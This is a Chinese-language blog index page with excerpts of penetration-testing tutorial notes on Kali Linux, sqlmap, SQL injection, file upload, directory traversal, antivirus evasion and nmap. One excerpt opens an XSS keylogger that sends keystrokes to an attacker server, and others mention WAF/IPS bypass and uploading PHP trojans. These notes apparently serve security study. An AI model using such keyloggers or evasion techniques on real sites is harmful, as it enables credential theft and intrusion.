- 博客(24)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 在线渗透盒子,集成了近百个常见的渗透渗透工具,类似软件商城的工具可以进行工具下载
该工具是一个类似软件商城的工具可以进行工具下载,工具的卸载,工具的更新,工具编写了自动化的安装脚本,不用担心工具跑不起来
2023-12-23 18:27:48
1189
原创 Full-Scanner是一个多功能扫描工具,支持被动/主动信息收集,漏洞扫描工具联动,可导入POC和EXP
Full-Scanner是一个多功能扫描工具,支持被动/主动信息收集,漏洞扫描工具联动,可导入POC和EXP
2023-05-27 22:56:40
592
原创 1.木马病毒和免杀技术
第17章 免杀杀毒软件叫杀毒软件变成了防病毒软件为什么叫防病毒软件应为做的黑客做出来木马病毒运行在很底层在开机运行之前木马病毒就在引导的时候已经启动了所以杀毒软件杀不了他企业的防病毒软件企业的防病毒软件都有一个单独的控制台控制台就可以控制企业下面的所以设备的安全杀毒软件的原理杀毒软件的有一个病毒库,里面存放着特征码基于对二进制的文件或者对数据包进行...
2020-03-31 12:51:54
679
原创 2. XSS- 键盘记录器和反射型XSS
任务099:XSS- 键盘记录器和反射型XSS进行xss利用进行键盘记录发送给黑客黑客的服务器大部分但是用的肉鸡服务器1 . 创建一个Keylogger.js文件下面文件内容意思就是将输入的内容发送给服务器http://192.168.55.26/keylogger.php文件document.onkeypress = function(evt) { evt = evt || win...
2019-12-20 19:07:52
434
原创 5. sqlmap工具详细使用任务097:SQLMAP自动注入找到漏洞后阶段
ingerprint: -f, --fingerprint Perform an extensive DBMS version fingerprint Enumeration: These options can be used to enumerate the back-end database management system information, st...
2019-11-30 00:51:22
1390
原创 4.任务096:SQLMAP自动注入绕过WAF , IPS
Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) ...
2019-11-24 12:34:32
758
原创 3 sqlmap工具详细使用 任务095:SQLMAP自动注入扫描时间和优化
任务095:SQLMAP自动注入(二)-REQUEST和SQLMAP自动注入(三)-OPTIMIZATION设置时间参数1.1设置扫描时间用sqlmap去扫描别人的网站会发送大量的请求可能目标服务器会发现你给你屏蔽掉,我们可以设置发送包的时间--delay 要指定的时间 时间是秒1.2设置超时时间--timeout 要设置的时间 默认为30秒,30要没有...
2019-11-19 00:06:23
835
原创 2 sqlmap工具详细使用 SQLMAP自动注入头部的修改
请求类型的参数:这些选项可用于指定如何连接到目标URL--method=method强制使用给定的HTTP方法(例如PUT)--data=要通过POST发送的数据数据字符串(例如“id=1”)PARAM-DEL = PARA。用于分割参数值的字符(例如&)--cookie=cookie HTTP cookie头值(例如“PHPSESSID=a8d127e…”)--...
2019-11-14 18:44:49
3553
原创 1 sqlmap工具详细使用 任务093:SQLMAP- 自动注入
任务093:SQLMAP- 自动注入 笔记 1. sqlmap介绍介绍开源sql注入漏洞检测,利用检测动态页面中get/post参数,cookie,http头数据榨取文件访问操作系统命令执行引擎强大,特性丰富Xss漏洞检测五种漏洞检测技术基于布尔的盲注检测’ and 1=1基于时间的盲注检测基于错误的检测’ and...
2019-11-08 10:34:45
394
原创 sql盲注 各种方法拿到 管理员账户和密码
任务092:手动漏洞挖掘-SQL盲注笔记介绍web没有编写好显示过滤有数据库返回的报错信息,黑客可以通过报错信息了判断漏洞存在下面就是没有过滤好发现了他存在sql漏洞sql盲注就是看不见他报错的信息,报错的信息被过滤了,看不见我们在进行sql注入这个就叫sql盲注了看一下返回就结果没有显示任何东西...
2019-11-08 10:09:05
1491
原创 3 sql注入 暴力破解
information_schema所有信息都在这个库里面1.如果没有权限访问information_schema库的话,是不是没有办法访问信息了?2.假如管理员的安全意识好的话那么他叫mysql权限设置小的话,那是不是有漏洞也做不了什么事情那?3.其实也是可以做到的,可以用猜测你的表名叫什么库名叫什么和列名叫什么,这种的破解类似于密码的暴力.破解需要字典,前提需要看服务器返回的,如果错误...
2019-10-19 22:37:52
836
原创 2,sql注入 , 读文件和写文件
任务091:手动漏洞挖掘-SQL注入这个是接着上一个1,SQL注入,查看服务器系统,拿到账号密码。写的开始实验靶机metasploitable-linux-2.0.0利用一个函数进行读取系统文件下面都是用burp进行发送的请求发送的请求是1234使用burp看看请求的内容在burp工具里发送到Repeater模块里在这里面原始数据直接可以看见发的信息双击就能修改里面的1234...
2019-10-13 21:01:58
772
原创 用nmap查看局域网存活的主机
nmap是一个非常强大的扫描工具一个著名的扫描大王用nmap进行局域网扫描先用查看一下ip段ifconfig然后用nmap -sP 192.168.43.0/24-sP是ping扫描,24是扫描到255...
2019-10-03 21:10:14
14719
原创 win10重装系统出现当前windows用户系统盘展开文件权限不足 请您提高权限
win10重装系统出现当前windows用户系统盘展开文件权限不足 请您提高权限我在一键安装系统软件上出现了这个问题在设置了用户权限也行不通最后吧安装系统的文件放到其他盘就可以了...
2019-09-27 11:50:31
7316
原创 kali 最新版教程 更新源 和 安装搜狗输入法输入法
安装好kali先要更新源话不多少先打开sources.list文件这个文件在根目录/下的etc里的apt里sources.listleafpad是个编辑器使用编辑器打开sources.list这个leafpad /etc/apt/sources.list...
2019-09-25 19:18:38
325
原创 5,手动挖掘漏洞,详细解说,明实验和使用 2,文件上发漏洞
可以查看a.php是什么内型的a.php文件内容文件类型是从前大概10个字节进行定义的查看前10字节可以判断文件类型把a.php修改成a.txt查看类型还是php类型应为他先看你的文件头然后在查看文件的具体内容靶机安全级别高上发a.php木马文件只能发送照片正常访问是可以正常上发的上发a.php就不能上发过去了修改文件类型也是上发过去的发送a.php是个木马没有修改的...
2019-09-24 20:44:06
300
原创 4,手动挖掘漏洞,详细解说,明实验和使用 1,文件上发漏洞
任务088:手动漏洞挖掘(四)在kali有存在典型通俗的字典文件在kali下/usr/share/wfuzz/wordlist不同的类型都放在不同的文件里下面简单介绍一下1, 文件一general 里面都是放的是猜网站文件目录的big.txt 对子目录的爆破的字典http_methods.txt http方法的字典2,文件二Injections进行注入的bad_...
2019-09-24 19:49:14
396
原创 3.手动挖掘漏洞,详细解说,明实验和使用 文件便利,远程文件包含,本地文件包含
任务087:手动漏洞挖掘(三)Directory traversal (目录便利)目录便利漏洞: 正常情况下都是访问www里的文件。通过URL地址和参数地址从而访问到www以外的目录或文件,要是你用权限比较高的话运行服务器那么访问其他目录的权限就比较高就是服务器软件的权限File include(文件包含)文件包含漏洞:比如php的include函数他可以吧www文件以外的目录 i...
2019-09-22 21:05:15
325
原创 2.手动挖掘漏洞,详细解说,明实验和使用
任务086:手动漏洞挖掘(二)这个是我的看的教程的笔记。里面是我自己实验的照片。挖掘漏洞原则挖掘漏洞原则是非常非常重要的1.1.所有的变量所有的变量都要去尝试,用各种各样的注入攻击手段尝试每一个变量每一个可以提交的数据的位置都要去尝试提交注入1.2.所有的头还要关住HTTP的头也是可以注入信息也可以完成相应的注入应为头也可以判断一个条件重定要关注cookie(苦k)1.3....
2019-09-16 14:39:19
751
原创 1.手动挖掘漏洞,详细解说,明实验和使用 (身份验证)
任务086:手动漏洞挖掘(二)这个是我的看的教程的笔记身份认证1.常用弱口令/基于字典密码爆破2.账号锁定3.信息收集手机号密码错误提示4.密码嗅探常用弱口令/基于字典密码爆破 就是像网站登陆账号密码了列账号admin密码123456账号锁定就是连续密码错误就不在登陆了信息收集1.手机号像出来的账号里手机号什么什么的排名像18272xxxx15就号找到这个账号2.密码错误...
2019-09-14 11:32:57
866
原创 详细安装 kali 教程 和 基本命令使用
Kali Linux是基于Debian的Linux发行版 有上千个渗透工具下载kali官方https://www.kali.org/安装kali这个是用的我2019.2的选择好下载kali的路径然后下一步选择好linux的版本下一步选择好kali虚拟机名这个是就我就叫他kali和他的安装位置默认20g我感觉不够用我就用60g这个是叫内存设置2g和cpu内核2启...
2019-09-09 09:04:40
13416
2
原创 渗透测试系统 Parrot Security 最新版 安装教程
Parrot Security 是这个装逼非常好的一个系统哈哈哈就这样说说。闲话不多说开始正式的安装。下载镜像官方下载这个我用的这个版本虚拟机安装这个可以叫安装到其他硬盘大的地方这个我喜欢50g这个cpu是2内存也是2开始安装这个我选择的是图像的我英语不好我就选择中文的了,你们随便这个是登陆密码设置一个普通登陆账号这个...
2019-09-07 16:38:58
6547
原创 kali 安装OpenVAS和使用
安装环境虚拟机kali 2019.2OpenVAS是一个服务器类型的扫描工具是免费开源的web应用扫描工具我也是说其他的了下面是他的安装和配置-下载apt-get install openvas...
2019-08-30 14:04:45
1816
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人